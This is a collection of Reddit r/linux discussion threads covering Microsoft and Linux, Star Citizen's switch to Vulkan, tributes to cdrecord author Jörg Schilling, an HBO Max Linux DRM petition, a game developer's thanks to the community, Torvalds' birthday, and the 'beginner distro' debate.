I think you're ignoring all of the work they've been doing with Linux. As much as the old Ballmer hate simmers in people's memories, you have people working there now who grew up learning to code in open source environments. I'd rather see them releasing code on GitHub, trying to get .NET up and running across platforms, and getting their people involved in making the tools work better no matter where you are. I always PREFER open tools and open processes whenever possible. But I also live in a world where Microsoft runs the show, and the more they do in these directions, the more opportunities I'll have to pull open source projects and more Linux into day to day work.
Mini-Rant/Offtopic: I don't get the horseshoe mentality within the development community, especially open source, the whole all free or all proprietary speeches is really quite annoying, it's like those doomsayers or politicians saying everything is fine.

First of my theory as to why Canonical has partnered up with Microsoft, Microsoft has developed essentially Cygwin2.0 to run Linux tools, so for Canonical this is free publicity (somewhat) and they get to be the ones that fills the gap (thus leaving out Red Hat for once, granted this is more tin foil hat theory).

Second of all, Microsft hasn't 'hated' Free software, i.e. because of those pesky developers who talk about free as in libre licenses and program software that goes by that philosophy.

No they 'hate' Linux because it's superior, it's got larger market share in certain fields Microsoft before had monopoly over and how it can 'grow' exponentially without any means to stop it (hence the Ballmer quote).


It's the same with Google, which people seems to like to brush under the rug now, Microsoft 'hates' fair competition, it's that simple.


Why do you think Microsoft hasn't done smear campaigns against Apple, a much bigger competitor to Microsoft in phone and desktops?

We don't know everything, but most likely they get something from Apple.

And also culture do change, otherwise they die.
Frankly, you seem to have the same kind of vendetta against Microsoft that you claim it has against Linux. Tribalism is a shitload of fun though; don't let me poop on the party
[deleted]  
 
It's still embrace, extend, and extinguish. They are still extorting Android companies, .NET still can't be compiled freely from source, some unknown party is still funding the freaking SCO lawsuit (wonder why that could be?)
As others said, your rant sounds a bit senile. But we all know that it is not entirely devoid of reason to be skeptical of Microsoft. Let's just make a promise not to trust them to the point of handling over the ideals of free software.

Canonical can team up with Microsoft all they want. What it should mean to the Linux community is that we stop treating Ubuntu as the canonical (heh) Linux distribution for the masses.
I can't wait to hear your opinion after Microsoft finally open-sources the Windows kernel or userland!
As a Microsoft engineer who regularly uses Linux:

:(
> Years ago we stated our intention to support DX12, but since the introduction of Vulkan which has the same feature set and performance advantages this seemed a much more logical rendering API to use as it doesn't force our users to upgrade to Windows 10 and opens the door for a single graphics API that could be used on all Windows 7, 8, 10 & Linux. As a result our current intention is to only support Vulkan and eventually drop support for DX11 as this shouldn't effect any of our backers. DX12 would only be considered if we found it gave us a specific and substantial advantage over Vulkan. The API's really aren't that different though, 95% of the work for these APIs is to change the paradigm of the rendering pipeline, which is the same for both APIs.

[Source](https://forums.robertsspaceindustries.com/discussion/comment/7581676/#Comment_7581676)
Good to hear that they are considering Vulkan! Go Linux-port!
I would be so happy if they would support a Linux version ᕕ( ᐛ )ᕗ
This is big for Vulkan and Linux gaming in general
I don't invest in pre-order stuff anymore, but I will certainly buy this if it actually delivers.
[deleted]
Any move away from Direct X is a good sign, but does anyone remember Duke Nukem Forever? Obviously Star Citizen has already released more than DNF did, but 3 engine changes in 6 years sounds like a song I've heard before.
For a game that has been worked on since 2011-2012, this seems like a significant amount of engineering debt to incur. 
If this leads to a linux port of the game, I will actually move to linux for anything not work related.
Thank goodness. Tired of DX failed promises. Especially DX12 and nonsense A-Sync no developer would bother with anytime soon. 
Vulkan sounds like a no brainer for new AAA games, but Star Citizen has been in development since forever and they don't know what graphics API they are going to use? Seriously? About dropping DX12: wait til they get a visit from the DX12 lobying team (I assume that that's a thing).
Nice to hear! :D
Awesomeee!
Now if they could just you know release it 
If they can hold out for a few more years, then they can drop DirectX 12 as well.
And if one of your dev wants to go mobile he can still use his vulkan knowledge.
I thought that star citizen was a scam?, I guess Balmer was right.
* affect
[deleted]
> **Years ago** we stated our intention

This game will never be finished. It's going to end up like Duke Nukem.
> eventually drop support for DX11

is different from

> plans to drop DirectX 11

OP, be careful with the title!
[deleted]
Drop DX11? Too soon I think.
Jörg Schilling has sadly passed away from complications with Kidney Cancer.

He's best known for epic usenet flame-wars and the epic \`cdrecord\` app which helped burn millions of copies of Linux and other open source applications.

A hero of open source software has been lost today.

&#x200B;

[https://minnie.tuhs.org/pipermail/tuhs/2021-October/024523.html](https://minnie.tuhs.org/pipermail/tuhs/2021-October/024523.html)
I worked with him on schillix. He was a very talented engineer with a lot unix eperience. He did not only wrote cdrecord but also his shell, Editor and tar Program.

We lost a good one!
I once got into a mini-flamewar with him over on the German [heise.de](https://heise.de) forum ... That was until I mentioned that the backup script that I had written for my employer at the time was using his implementation of "tar" underneath all of it:  `star`

His "tar" implementation was so so much superior to any other "tar" version that existed at the time. And I told him that ...

His reaction?  He offered to review my backup script ...

He optimized the hell out of it making the sections that made calls to his `star` program even faster.

He was difficult to get along with sometimes, yes. And he might have come across as "combative", "aggressive" and it was very easy to trigger him and get him to enter a flamewar with you, right then and right there if need be.

But oh boy oh boy did he know his stuff!!  

Rest well Schily.

And thanks for saving my arse with that backup script, back when I was a complete noob.
cdrecord helped me extensively in my Linux journey. Thank you Jörg
It was always great to have him at our NetBSD booth at the Chemnitz Linux Days, especially when we could discuss our VAX.

And I will never forget how he started a live action flame war in my 2nd or 3rd talk I ever gave. It was not my fault his star implementation didn't work on NetBSD as it did on Solaris.


Rest in peace, Jörg.
I had the pleasure of meeting him several times at conventions, and talked to him for hours. We truly lost a great person yesterday, I'll remember the conversations we had very fondly and the knowledge we shared. He really left us too soon.
Fuck cancer.
Someone who could bang bits at a low level, and also make software as widely portable as cdrecord, was a huge talent.

Vielen Danke, Herr Schilling.
RIP.

"epic flamewars" is not a legacy I would wish for though.
Huge talent, very very very hard to get along with. Hope he finds peace.
RIP :(
I am a good friend and former intern of Jörg and the one to write this obituary.  AMA.
I will burn a cd in your honor lieber Jörg.
This:
>Ein Titan unter den Dickschädeln dieser Welt.
>
>Ohne Dickschädel gibt es keinen Fortschritt.
>
>Wir brauchen mehr Dickschädel. 

http://blog.fefe.de/?ts=9f9add44
Jörg, I never met you but used software you wrote. Thank you for everything and rest in peace.

F and thoughts and prayers to your loved ones and family.
GNU, Jörg Schilling. :(
:( awful news.
R.I.P.
So sad. Used to use cdrecord a lot, it was a great app. Terrible loss.
RIP seems like a cool dude, sad i didnt get to meet him
RIP
R I P sir ty for your service
RIP
May he find peace. He fought for what he believed in.
So sad to hear
I still use tar everyday
https://en.wikipedia.org/wiki/Cdrtools#License_compatibility_controversy
Rest in peace Jörg, fuck cancer.
Rip
This is so sad. I do remember using that quite a bit in my early Linux. Sadly I never paid attention to the names behind the software. Opensource sometimes hides the great people behind it as it is free from the hands and minds that write it.
RIP and respect.
I don't know who he was, but anyway. Rest in peace...
RIP
Jörg
Hello everyone,

I've just created a petition to HBO urging them to re-enable support for streaming content from their HBO Max service on Linux machines. Until a few weeks ago, everything worked fine, but then HBO enabled the "Verified Media Path" setting in Widevine DRM, preventing Linux machines from getting a playback license. It's worth noting that Chrome OS remains unaffected, despite the fact that, strictly speaking, it too is a Linux-based operating system.

Other streaming services, from Netflix and Hulu to even Apple TV+ still work under Linux with no problems. If you'd be so kind, please sign and share so we can get some exposure and build momentum.

[http://www.change.org/hbomaxonlinux](http://www.change.org/hbomaxonlinux)

Thanks in advance!
They're making it hard for you to give them money?

Fire up a vpn and a torrent client.
DRM has always put open systems and open-source systems at a disadvantage.

It was argued that standardized HTML5 DRM would bring an end to proprietary, closed systems like Flash or Silverlight, which had been leveraged for DRM. Possibly it's succeeded in that, but we also know that Flash was already dying and Silverlight was mostly dead, even before HTML5 EME.

It's clear at this point that HTML5 EME DRM hasn't been any better for Linux, BSD, or other open systems, than Flash was. Going forward, my vote is going to be against DRM, even if it claims to be an open standard.
Petitions are useless. The only thing you can do is cancel, and let them know why. Unfortunately the Linux user base is small enough this probably won't work either.
Really bad idea because it shows them how few people interested actually use linux compared to their subscriber base as a whole. You end up reinforcing their decision. Making it all about the numbers does not work in desktop linux's favor
A petition is like a beggars pleading... just turn it off and don’t subscribe ..let them count their losses and decide if it was a good move.
[deleted]
Signed!

But I wouldn't give a fuck about them or any other company that desn't support Linux.

I am a Linux user and I'm not paying for any service that doesn't support it natively or wants me to jump through hoops for it.

I am the client, it's my right to say my way or they highway, not theirs!
This is the exact reason why piracy has always been the more user friendly option.  
Won't let me buy your media? no problems!, i'll just watch it elsewhere.
I do not understand the HBO's decision. It makes no sense
Begging corporations to take my money is not something I'll ever do. If they want my business then they can do what they need to do to entice me to pay them for their services. If they can't be arsed to do that then fuck them. I won't beg.
Better idea: Never watch or pay for HBO again.
they aint gonna give you shit, join me in piracy comrade
Already cancelled, obviously they don't want my money
They don't care. I submitted a support request, and when I told them I was running Linux, they said it wasn't supported. When I asked to have my account closed since I could no longer use the service, the next email was an automated reply notifying me that my account was closed.
Why do you want to argue with terrorists?
Doubt this will do much, but signed it anyway because why not, even though I hate [change.org](https://change.org) from the bottom of my soul.
Petition to HBO: Eat a bag of dicks.
[deleted]
I mainly use my PS4 for streaming, but before I had that, I remember having to run Windows in a VM to stream from just about any subscription site. Did Netflix et al. pull their heads out of their collective asses on Linux support? I never heard about that. When I heard HBOMax didn't work with Linux, I just thought, add it to the list.
I find it ironic, in a kind of admirable way, that the folks who wish to be honest and pay for the content are the ones asking HBO to support Linux.  There are those in the Linux community (not pointing any fingers at anyone specifically) that might just shake their heads and say *"... or don't, easy enough to just pirate the content if my money isn't green enough for you"*.
"No."  --HBO
I won't sign the petition. It's clear they don't want my business. I'll just stick with other methods of obtaining their content.
[deleted]
Lol petitioning to HBO. This is where DRM gets us. Do the DRM apologists have anything to say?
You don't need HBO.
They won't.
Done, I 🧡 linux
I signed. Please don't ever use [change.org](https://change.org) again please.
Their public stances on others things should already make you not want to give them any money.
Oddly enough, the first time I connected there were 490 signatures. I filled out the form but had to turn off my adblocker. I did that and the signatures dropped to 468 but rising. After I filled out the form, the number went back to 471 (after rising to 485 while filling out the petition a second time). I'm expecting my junk email address to get some more junk starting today or tomorrow.
This is the exact reason my Criterion Channel subscription lasted less than a day. What's with all these platforms shooting themselves in the foot?
just pirate their shit
`pacman -S galleon parrot rum`
Fuck HBO. All my homies hate HBO.

At this point just cancel your subscription, you're not happy with it and can't use the service that you're paying for, so just cancel your subscription and when they dare complain, send them a video of you torrenting every single episodes of game of thrones.
Signed
So I agree with this but there are extensions you can get on your browser that simulate windows/Mac devices. That’s been working for me
What? I'm using HBO Go on my linux and it's everything fine, wtf
[https://www.reddit.com/r/linuxmemes/comments/ijh9zm/drm\_is\_not\_the\_answer/?utm\_source=share&utm\_medium=web2x&context=3](https://www.reddit.com/r/linuxmemes/comments/ijh9zm/drm_is_not_the_answer/?utm_source=share&utm_medium=web2x&context=3)
This. And to stop autoplay.
That's scary because they (AT&T's subsidiary WarnerMedia) also own VRV and Crunchyroll, which still work on Linux.
Signed
[I don’t use HBO but try this and see if it helps.](https://addons.mozilla.org/en-US/firefox/addon/user-agent-string-switcher/)
So is the reason why this can't be ported that it's closed source? Is it literally just a piece of software that does zilch other than have limited OS support ?

Is it not possible to throw Firefox on wine or use chromium to avoid chrome?
Does the Verified Media Path actually prevent ripping?
Hey, you possibly could use something like an os spoofing extension on a chromium browser. I know there's some tutorials for using that type of extension to get GeForce now working.

 I'm not really sure the underlying reason why it's not working for Linux machines... But it stands to reason that if it works with Chrome OS then it should work on Linux right?
I wonder if you could do some weird alchemy using Windows Winevine + binfmt_misc + Wine to run it on Linux with a native browser. I was able to do this with a x86 Flash binary on an ARM Linux browser years ago.
You don’t support Linux I don’t support you. Thankful plain Jane media files can be played on practically anything under the sun and with the most choice possible. Fuck their platform. Who needs another subscription anyways.
I think this is a sign that they don't want your money.

Set up a VPN and pirate away my friend.
I think it is pointless. if they don't need your money and show it in this way, time to fly the Jolly Roger
Is there a reason for Linux to not support the DRM ?
 
Is it just because no one bothered implementing it or maybe the Linux devs don't want it in ?
HBO Max is now working on my Linux system.  
Using Firefox on Solus.
[deleted]
Just pirate ffs
Stop making petitions that hurt the Linux community
Did you try change user agent (Firefox). There is option to choose operating system
[deleted]
I recently asked [r/linux\_gaming](https://www.reddit.com/r/linux_gaming/comments/n2i4mk/a_friendly_linux_user_recently_offered_to_help_me/) for some support in testing my game ([World Turtles](https://store.steampowered.com/app/1512050/World_Turtles/) on Steam) in the hopes that I can support Linux one day. The response I got was the most positive \*and\* technically knowledgeable I've come across yet during my 18-month-journey with this game.

I've never had anything to do with Linux, but the Linux community has left me pleasantly surprised. I thought you might like some positive feedback.

I will do what I reasonably can to ensure I eventually support Linux!
The developer of Supraland had the opposite experience. He released a Linux version of his game, because the engine/platform he built it on supported it, but he got such detailed error reports he didn't know what to do with 'm since he never used Linux before. He decided to no longer release for Linux.
I downloaded the demo.  The game ran fine technically.  Some feedback though:  I think the UI needs improvement.  I just couldn't figure out what I was supposed to do once I was in game.  The only help I saw was a bunch of messages about the controls that got spammed out in quick succession while I was still in the main menu.  It looks like an RTS but clicking on the workers or the buildings did nothing.  Finally, after a lot of clicking around on the UI buttons, I got my dudes to construct a building but had no idea what the building was supposed to do or what the goal of the game was.
To me it seems like linux users being tech-savy isn't just a coincidence. On e.g. windows, if you got an issue, you follow 20 outdated screenshots in a different language and learn nothing if you get it to work or are frustrated if it doesn't.

On Linux often goes like: "Check this out, this program checks this config file. Here are some options that you can put into that file. For this specific problem, you'd want to add this line:..."

At least for me I always feel I learn something after looking up a solution for a linux problem.
I think I should look more into friendly Linux communities, then. Often when I google problems I get linked to sites with snarky forum users who bitch at others to just google these simple problems (or to use the search function since this has been answered 5 years ago on this board).

Enough with the pessismism though. Can you guys maybe recommend some good communities? I don't even care for *what* Linux-related things exactly, I just want to hear more positive experiences. I, for example, came to like /r/raspberry_pi
You can solve that real quick. All you have to do is mention >!systemd!<.
It's great to see when a community is positive and supportive! 

Also keep up the good work, it looks very interesting!
This game looks awesome! I'm a Linux using steam user who loves paying for games and supporting indie devs (or big dev shops for that matter, just take my Linux money already).
I need a hug as well, give that to me too :)
Dawg, Im not tech savy but I was still able to install arch without a install script.
That looks like a cool game, I'll have to check it out. I hope it is successful and thank you for supporting linux.
You are very welcome.
Thank you for saying. I just wishlisted it. Thank you for being one of the developers bringing games to Linux. You are appreciated. Good luck with the game
Yup, this makes my heart warm, thanks for sharing. I am too grateful to be part of this community, it’s uplifting and cool.

I wish your journey with linux to be enjoyable!
titles that would make absolutely no sense whatsoever 15 years ago :D it is a great improvement IMO
Every once in a while you come across someone with a toxic mindset, but for the most part 'Nix users just want to help and make it easier for others who might be curious about it to give it a try.
If you want to give Linux a try, the easiest way is probably with a bootable Ubuntu USB stick, so you don't have to install before trying: [https://ubuntu.com/tutorials/create-a-usb-stick-on-windows](https://ubuntu.com/tutorials/create-a-usb-stick-on-windows)
Amen.  Linux community is tops!!!
As an old head, never thought I'd see this title.
linux is awesome community
This post gives me the warm and feelies even as a jaded veteran.
Are you sure these were real^TM Linux users? Clearly not from the Arch forums.
Give linux a try. It's not for everyone, for those willing to pursue, it is an extremely rewarding path. Linux is a branch not just to a different experience on the computer, but to a far different way of thinking, and I hope you join.
You should support the Linux master race first always and then port it to win after
[deleted]
My current laptop is a MacBook Pro and I want to switch to Ubuntu on my gaming laptop, but at the same time I also don't want to have to deal with my games breaking.
Well, you’re welcome, I’m.... a little surprised, but pleasantly so
What a nice thing to read! btw i use arch
I faced the opposite. I had posted something in Linux questions community and people downvoted it without a specific reason. Downvoting is a toy.
Just don't mention Windows or Microsoft or dare suggest that having to do basic things in CLI is outdated and shouldn't be a thing in 2021.
Friendly community is the last word which I would use to describe this community. Of course, if you think like majority then it's a nice little club of blowing each other, but when you try having different  opinion, for example "I think that Windows/Mac is better than linux sometimes" better prepare to be attacked, not in friendly way

Hey he has the same birthday as me, cool :-)
Grattis på födelsedagen Linus!
"oooh yeah my birthday, hum nevermind i have kernel's stuff to do today"
Til Stan Lee and Linus Torvalds share a birthday
Keep on trucking Linus, ya flying Finn
HBD Linus and thanks for putting NVIDIA in its proper place.
Its my birthday now, and yet I don't share it with him. Go figure.
I wish he would do an AMA.
BSD, Lunix, Debian and Mandrake are all versions of an illegal hacker operation system, invented by a Soviet computer hacker named Linyos Torovoltos, before the Russians lost the Cold War. Torovoltos is a notorious hacker, responsible for writing many hacker programs, such as "telnet", which is used by hackers to connect to machines on the internet without using a telephone.

(http://www.adequacy.org/stories/2001.12.2.42056.2147.html)
He is 46 today.
Excelsior!
live long!
Happy birthday, you glorious, glorious man.
Wow I've been on reddit for a while, never thought to see Bucky in here. I followed your Android and Java tutorials(I'm not sure but I think you a qt C++ video.) and I enjoy them! 
He has the same birthday as my mom
TIL I share my birthday with Linus Torvalds and Stan Lee .. funny considering how much I love Linux and Stan's superheroes
So where's my free meal?
Happy Birthday Linus Torvalds!!
ggwp
Happy birthday, and happy new year (soon)
Happy birthday "perkeleen vittupää" o/ 
You know he'd probably call you a cunt or something as soon as thank you.
If we want people to be using linux instead of Windows or Mac OS we shouldn't make people think it's something that YOU need to put effort into understanding and belittle people who like linux but wouldn't be able to code up the entire frickin kernel and a window manager as "beginners". It creates the feeling that just using it isn't enough and that you can be "good at linux" when in reality it should be doing as much as possible for the user.


You all made excellent points so here is my view on the topic now:

A user friendly distro should be the norm. It should be self explanatory and easy to learn. Many are. Calling them "Beginner distros" creates the impression that they are an entry point for learning the intricacies of linux. For many they are just an OS they wanna use cause the others are crap. Most people won't want to learn Linux and just use it.
If you want to be more specific call it "casual user friendly" as someone suggested.
Btw I get that "you can't learn Linux" was dumb you can stop commenting abt it
When I started using Linux, I did a search for “Beginner Distros”. I am now a senior Linux admin. I never felt inferior or shamed. But maybe others feel different.
Retired long-time linux user here. **9 years on Gentoo \~x86**, then 5 more on Ubuntu. I knew 1000+ Gentoo packages by name and function and many by build flags and dependencies.

If I now need Linux for some desktop task, **I pick some friendly Ubuntu fork** like Zorin OS. *(edit:* [*just use Шindows‽*](https://www.reddit.com/r/linux/comments/vmpqry/comment/ie9k817/)*)*

Newbie move, right?

I don't care. **I want the damn thing to work** while putting minimum effort to get there. And if it breaks, community has answers so I don't have to figure it out myself like it's 2000s.

* I want drivers be installed out of the box,
* want windows to be scaled for my HiDPI screen,
* want app shop with actual apps,
* want sane defaults for all settings so I don't need to change them,
* want disks to auto-mount and updates to auto-install, etc...

Consider me a newbie if that are newbie dreams
[deleted]
But how are we going to gatekeep? /s

I use Ubuntu btw.
I understand why some might call it gate keeping, but I really wouldn't want someone's first Linux experience to be something like arch, which is what often gets talked about on reddit.

If you were to casually browse most Linux subs, you would probably come to the conclusion that the majority of people use arch and may look into it yourself. And as soon as you have to open the wiki for the 15th time before you had a browser running, you'd go back to windows and never look back.

The "user friendly" distros I would say are talked about way less.
....scratches my gray beard......

Compared to the distros of old, all of the modern distros are beginner distros
Doesn’t Linus Torvalds himself use Fedora? That pretty much settles it, imho. He once told the audience at a Debian convention/conference that Debian was too much of a hassle for him to install. I love that guy.
Yes, hard agree. This also has the implication that low-maintenance desktops can’t be used to get Real Work™ done. It’s a bad look for the whole Linux desktop landscape because the proprietary operating systems claim to be both easy to use and productive and people are getting this messaging that you can only have one or the other on Linux-based desktops. Which is made even more wild by the fact that because of fd.o apps generally run across all distros so your distro has a low impact on what work you can do in most cases.

And it’s just gatekeepy and gross. We shouldn’t expect that everyone wants their computer to be their hobby. Casual computer users should be able to use an open source operating system and reap its benefits too.

If I had my way I would like people to start using words like “Casual” or “Low-maintenance” vs “Hobbyist” or “Industrial Grade” or some set of words that more accurately reflects people’s needs in a way that isn’t judgmental or imply that one group is better than the other. It’s okay if you just want your computer to be an appliance and it’s also okay if you want control over every process. Neither use is more valid than the other
I used Linux on and off for 10+ years, but I've never been able to code anything.  Am I still a beginner?  An OS that looks different than Windows is not a problem.  But I'm not a programmer.  I just want a cheap OS that works.  I've had all sorts of issues with Windows and something new seems to break with every unauthorized "update", so I'll probably be back to Linux on my work PC.  That PC, Windows refuses to play nice with my GPU and refuses to let me install the driver.  The same hardware that worked before I changed 1 part and needed to reinstall the OS.  Oh, and Windows doesn't have the "sleep" option on the PC.  It all just works with Mint and a few other distros I sampled.
The biggest reason "beginner distro" sucks as a term is that there's an unspoken expectation that everyone, given enough experience, would eventually migrate to an "advanced distro".
I started using Linux with elementary os because I heard a lot about how user friendly it was, but behind its friendliness there were many limitations and stupid decisions. So I was forced to study a lot on my own in order to somehow make the system suitable for daily use. If I were less patient, I would still be on Windows.
User friendly and beginner friendly mean the same thing for 99% of people, getting caught up in which one people use doesn't matter.

What matters is that people who want to get into Linux should understand that it's very different from mac and windows in how it operates, and trying to treat it like other OS's will give you a terrible time. The Linux community at large does NOT make this clear, and constantly talks about beginner/user friendly distros, recommending Linux to people who should NOT be using it, etc. And this isn't me trying to gatekeep, I would love for more people to give Linux a chance, but in its current state it is NOT for everyone and we need to stop recommending it like it is.

Linus in the Linux challenge is a very good example of someone who went in expecting their previous windows knowledge to help them and had a lot of ideas of how "beginner distros" like popOS work, was very confident, learned very quickly the previous experience didn't help and that Linux was very different to everything he had used, didn't want to put in any time to relearn things because 99.9% of people don't care about their OS that much, then stopped using Linux and (likely) won't ever use it again.

I don't necessarily blame Linus or other users who have experienced this for what happened, the blame should be on the Linux community for not making it more clear what to expect. People in this community want Linux to be mainstream and don't want to swallow the pill that, in its current format, no Linux distro will EVER be mainstream. Stop recommending Linux to everyone, stop talking about how beginner/user friendly it is, all that shit. 

Linux is not like other OS's, it behaves very differently and we all know this, yet we get so many recommending it to people as a Windows/mac replacement, recommending it to non-tech savvy people, the whole 9 yards, and it's driving people AWAY from Linux. **99.9 of people do not want to relearn how to use a damn computer to try out a new OS, us Linux users who did that are in a very small minority**.
I completely agree. 
I'm an advanced user that's been using Linux off and on since 2007 and am currently using Linux Mint as my daily driver and love it. I tend to distro hop but I've recently discovered that I just love the Cinnamon DE. It's everything I need/want and nothing more.
Same. Went back to Linux Mint after 15+ years, because I want something that just works and requires very little maintenance, with sane defaults. I don't have the time nor patience for it that I had years ago.
I also hate the notion that everyone starts with a "newbie distro" and eventually will end up distro hopping. I mean...it's fun for some people, I get it. But you cannot possibly expect everyone to care about their operating system so much that they keep reinstalling it all the time. Most people just want a system that works and does what they want it to do.
I feel like the word beginner infers that you need to go beyond them at some point, but it’s just not the case. I think distros like mint and fedora are great for most people and most don’t need or want to go beyond them, which is why I don’t like calling them beginner distros. Anyway, it’s still Linux.
even Linus Torvalds himself doesn't use a tweak heavy distro! he just uses Fedora
Judging by the comments, the 'Linux community' is about as much of a mess as the family tree of distros is.
I've been maintaining Unix/Linux servers for about 20 years.  I've been a Linux home user for 6 years.  I generally know what I'm doing.  I use Linux Mint.  Worrying about what other people use is a waste of your time.  If a friendly label like 'beginner' helps make some people decide to give it a try, how is that bad?
Gatekeeping is dumb and "beginner" should never be an aspersion. That said, "user friendly" doesn't always mean "has the lowest barrier to entry".  


For me personally Arch has been the most user friendly distribution I've used so far because it lets me use my computer the way I want to use it, I hardly ever have to worry about package availability, and things rarely break in ways that are a huge pain to fix or work around. It's a good sweet spot of user configuration and convenience features that has yet to be topped for my desktop use-cases.  


For a lot of people, "user friendly" means that their operating system explains itself to them as clearly and immediately as possible so they don't have to spend as much time up front learning how to interact with it. It may also mean that it does what they want without configuration. This is obviously a good thing in a lot of situations, but it isn't a good thing in \*all\* situations because one size fits all UX is always a compromise. Sometimes spending a bit more effort up front can save a lot of effort long term.  


There's nothing that says interfaces which explain themselves using simple and common denominator accessible design language are inherently for beginners, it's just that they're often the best place to get your foot in the door. They might be "beginner friendly" but that isn't the same as "can't be used for serious work". Spending ages configuring a custom workflow doesn't make you a better linux user than someone who uses gnome on fedora, it just makes you someone who values a custom workflow.
> Can we stop calling user friendly distros "beginner distros"

Fair enough. It's counterproductive.

> If we want people to be using linux instead of Windows or Mac OS we shouldn't make people think it's something that YOU need to put effort into understanding ...

But that's both true and unavoidable. New users will need to absorb a lot of new information. To say otherwise would shield people from a reality they need to accept and adapt to.

> ... and belittle people who like linux but wouldn't be able to code up the entire frickin kernel and a window manager as "beginners".

That's a straw man. But some term is needed -- non-graybeard, novitiate, recruit, fresh acolyte, end user, recovering Windows addict, 12-stepper, the list goes on.

> It creates the feeling that just using it isn't enough and that you can be "good at linux" when in reality it should be doing as much as possible for the user.

Also to some extent a straw man, because most people help new Linux users by asking what they want to do with Linux, and respond appropriately. Not all, but most.
Just wish for a linux distro with no problems out of the box. Each distros had problems that took me a long time to diagnose. And I can imagine someone who don't know what keyword to use in a search engine trying to fix their computer. One was incredibly weird. Pop os lets you pick the region of the server for updates, turned out the one i picked had outdated updates.
[deleted]
I take your point and agree with it up to a point, I don't think there's anything wrong with the term "beginner friendly" distro's, but the expectation from certain segments of the community that you will move on to something more "advanced" is a bit silly, considering there's nothing you can't do on the "noob" distros that you can't do on anything more "advanced" (which lets be honest, is always "arch btw").

>It creates the feeling that just using it isn't enough and that you can be "good at linux"

I disagree with this bit, you can be "good at linux" in the sense that you can use your OS effectively. I agree though that installing your OS from scratch in CLI and compiling your own kernels isn't the definition of "good at linux" which I think is what you were getting at.

Me? I've been here for 10 years, I use Pop! Why? Because it gets out of my way and let's me do the stuff I'm interested in. I want to use my computer to work, not have my work be my computer.
I agree with you, I prefer to refer to them as "just works" distros. I like to think I'm fairly competent with Linux, after administering a variety of linux servers, and I still love to use them. My pc runs Arch whereas my laptop that I use for college runs Linux Mint. Both great oses
I think user-friendly would be too subjective and exclusionary. Yes, some distros are more difficult for *beginners* to use because they don't understand the Linux internals well enough, *but that doesn't make them any less usable. They have a different userbase and different use cases.*

More "advanced" distros are often used by power users who appreciate customizability and minimalism, which they can't get without a great deal of effort in "beginner" distros. I find the vast majority of features in popular distros to be features *I don't want.*

Beginner/advanced isn't meant to be derogatory, it's meant to be descriptive.
Yeah, it initially gave me the impression that I had to "move up the ladder" to get the real good stuff and I was basically inventing reasons to switch.

But honestly, I now see no need to, it all boils down to what you want and need. Want Ubuntu? Use Ubuntu. Want Arch? Use Arch. Want to build something using LFS? Do that.

I like Fedora and recently people seem to call it a beginner distro as well, but I simply don't see the need to switch anymore now (went from Ubuntu -> Fedora).
I started using Linux in 1994. Today, I run a beginner distro as a daily driver, because I don't have to mess with things to keep it working. I have three applications for my daily use that I need to be more "bleeding edge" than they are in the distro repos, so I manage those separately (automated, of course).

My server runs a bog standard distro at the core, in LTS. On top of that the services I want to run are in containers. Nothing on the iron is bleeding edge. Anything which is so new it can cause damage is in a container.

I also sometimes, for fun, build a distro from scratch on a separate machine. Often a weaker machine, with low RAM and/or disk, to make it more interesting. I do this for fun. I do not see this as a way to run a daily driver, or to keep a server. It's a hobby, for enthusiasts, and as a profession it is limited to those who need total control over everything on the machine (which is a lot rarer than most people think it is).

I have absolutely no ego invested in this. I will happily run a beginner distro with training wheels on top if it allows me to get things done. As long as all the friendliness does not get in the way of me doing my thing, I'm all for it.
The first major step to getting Linux commonly used on the desktop is having distro's that are user friendly, without being sold as patronising things like 'beginner'. 

&#x200B;

For some people Linux would serve them well but it's so often portrayed as this colossal mountain of expertise you have to overcome. For many people who just want to do basic workstation stuff and don't want to be part of the Windows ecosystem it serves perfectly well.

&#x200B;

I will say I don't think this is a big of a problem as it once was, the community doesn't seem to pride itself on being impenetrable like it once did, and it's become a more open and accessible space. All moves I like. It's difficult to say anything absolute about a community as wide and diverse as Linux's, but this is my take at least.
Spent my first year studying CS on a WinXP machine until it was highly recommended to switch to Linux.

I have been on Ubuntu ever since. I figured that *if* a Videogame or other usually Windows software gets ported to Linux, it will mean Ubuntu.
It also makes people think that they are some how inferior or less capable than the “normal” ones when it’s the opposite. “Normal” distributions are the ones that are user friendly and the most used.
> Can we stop calling user friendly distros "beginner distros"

Can I just 100% agree with your whole post here?

This point is going to make people sore in the behind area, but I really, *really* think we need more development effort put into **being able to use Linux completely with the GUI, and with full Windows and MacOS levels of stability.**

The biggest point here is: Normal computer users can't *stand* using the CLI for very long. Normal people don't want to read through man pages, remember commands, configure things with config files, etc...

Funny thing is I'm sure some power users would like to use GUI programs for more things, if only they get didn't get turned off by "ew, bloat," or "ew, not enough features vs the CLI" Well then... put in those features, make it less bloaty! Just do it!

People on Windows and Mac are NOT going to use the CLI very often. **Why should Linux users have to use it to even solve problems?**

Now imagine telling that crud about "running commands" to your family members, a 50-year-old mother who doesn't know what's going on, or whatever else, right? 

The CLI is nice to have... but why do we **HAVE** to use it? In the past 30 years that GNU/Linux systems have been around, **we should have GUI utilities for EVERYTHING that has a CLI utility. No questions asked.**

It would make Linux as an OS feel more cohesive and approachable in general, instead of getting turned off by getting asked to use the CLI to solve problems.

Another point is that instead of making more distros, **can we just please support the fantastic distros that we already have?? Please???**

The world would be so much of a better place if Linux users could agree more on things, instead of disagreeing, whining, and arguing all the time. I know everything in the world has room for improvement, I know your opinions matter (sometimes), so I'm not at all saying to stop creating new ideas and try new things...

I just wish people would stop wasting their efforts so often. Your time on this Earth is valuable, so learn how to contribute it well.

Here's the thing, when things on Linux break, and come up with weird, confusing error messages, one distressed person goes, "HELP, HELP MEEE!!! PLEASE SOLVE MY PROBLEM ON LINUX I BEG OF YOU, GURUS!!! I NEEEEED THIIISSS!!" And then people say, "What is your OS, kernel version, network adapter, proxy port, browser, user-agent, zip code, zip program, file manager, wpa password, digits of your security number, please report your error message, become an IT professional, and oh... don't forget to check 1000 of your logs you dumb shit," *Huge, giant wall of craptext incoming that you have to scroll 10,000 times down to see the next comment*, or maybe another dude goes, "WHY HELLO THERE MY CHADSONS!! I KNOW WHAT TO DO! I'M THE BEST LINUX PRO EV3R!! WELL, JUST DROP INTO A TERMINAL AND RUN ALL THESE COMMANDS!! HURRDURR! I'M SURE IT WILL WORK AND SOLVE ALL YOUR FREAKING PROBLEMS!!!!"

I'm exaggerating Linux conversations, but they can feel really geeky to an outsider, who is just like, "Um... what's going on here? I just **wanted an answer I can read and do.** Should have stuck with Mac/Windows I guess. *shrug*"

